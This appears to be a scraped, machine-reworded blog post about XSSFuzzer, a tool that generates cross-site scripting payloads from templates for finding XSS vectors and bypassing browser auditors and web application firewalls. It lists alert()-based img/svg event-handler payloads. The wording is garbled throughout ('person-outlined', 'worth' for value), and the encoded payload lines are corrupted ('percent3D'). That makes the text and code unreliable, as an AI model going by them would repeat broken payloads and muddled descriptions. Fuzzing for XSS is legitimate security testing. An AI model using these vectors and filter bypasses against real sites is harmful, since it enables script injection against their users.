XSSFuzzer – A Tool Which Generates XSS Payloads Based On User-Defined Vectors And Fuzzing Lists

XSSFuzzer - A Tool Which Generates XSS Payloads Based On User-Defined Vectors And Fuzzing Lists

XSS Fuzzer is a straightforward software written in plain HTML/JavaScript/CSS which generates XSS payloads based mostly on person-outlined vectors utilizing a number of placeholders that are changed with fuzzing lists.

It gives the likelihood to only generate the payloads as plain-textual content or to execute them inside an iframe. Inside iframes, it’s doable to ship GET or POST requests from the browser to arbitrary URLs utilizing generated payloads.

XSS Fuzzer is a generic instrument that may be helpful for a number of functions, together with:

  • Finding new XSS vectors, for any browser
  • Testing XSS payloads on GET and POST parameters
  • Bypassing XSS Auditors within the browser
  • Bypassing internet software firewalls
  • Exploiting HTML whitelist options

In order to fuzz, it’s required to create placeholders, for instance:

  • The [TAG] placeholder with fuzzing record: img svg.
  • The [EVENT] placeholder with fuzzing record: onerror onload.
  • The [ATTR] placeholder with fuzzing record: src worth.
  • The payloads will use the talked about placeholders, equivalent to:
<[TAG] [ATTR]=Something [EVENT]=[SAVE_PAYLOAD] />

The [SAVE_PAYLOAD] placeholder shall be changed with JavaScript code equivalent to alert(unescape(‘[PAYLOAD]’));.
This code is triggered when an XSS
payload is efficiently executed.
The end result for the talked about fuzzing lists and payload would be the following:

<img src=Something onerror=alert(unescape('%3Cimg%20srcpercent3DSomething%20onerrorpercent3Dpercent5BSAVE_PAYLOADpercent5D%20/%3E')); />
<img worth=Something onerror=alert(unescape('%3Cimg%20worthpercent3DSomething%20onerrorpercent3Dpercent5BSAVE_PAYLOADpercent5D%20/%3E')); />
<img src=Something onload=alert(unescape('%3Cimg%20srcpercent3DSomething%20onloadpercent3Dpercent5BSAVE_PAYLOADpercent5D%20/%3E')); />
<img worth=Something onload=alert(unescape('%3Cimg%20worthpercent3DSomething%20onloadpercent3Dpercent5BSAVE_PAYLOADpercent5D%20/%3E')); />
<svg src=Something onerror=alert(unescape('%3Csvg%20srcpercent3DSomething%20onerrorpercent3Dpercent5BSAVE_PAYLOADpercent5D%20/%3E')); />
<svg worth=Something onerror=alert(unescape('%3Csvg%20worthpercent3DSomething%20onerrorpercent3Dpercent5BSAVE_PAYLOADpercent5D%20/%3E')); />
<svg src=Something onload=alert(unescape('%3Csvg%20srcpercent3DSomething%20onloadpercent3Dpercent5BSAVE_PAYLOADpercent5D%20/%3E')); />
<svg worth=Something onload=alert(unescape('%3Csvg%20worthpercent3DSomething%20onloadpercent3Dpercent5BSAVE_PAYLOADpercent5D%20/%3E')); />

When it’s executed in a browser equivalent to Mozilla Firefox, it can alert the executed payloads:

<svg src=Something onload=[SAVE_PAYLOAD] />
<svg worth=Something onload=[SAVE_PAYLOAD] />
<img src=Something onerror=[SAVE_PAYLOAD] />

Sending requests
It is feasible to make use of a web page vulnerable to XSS for various checks, equivalent to bypasses for the browser XSS Auditor. The web page can obtain a GET or POST parameter known as payload and can simply show its unescaped worth.

A reside model will be discovered at https://xssfuzzer.com

The software is in beta state so it might need bugs. If you wish to report a bug or present a suggestion, you should use the GitHub repository or you may ship me an electronic mail to contact [a] xssfuzzer.com.



Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.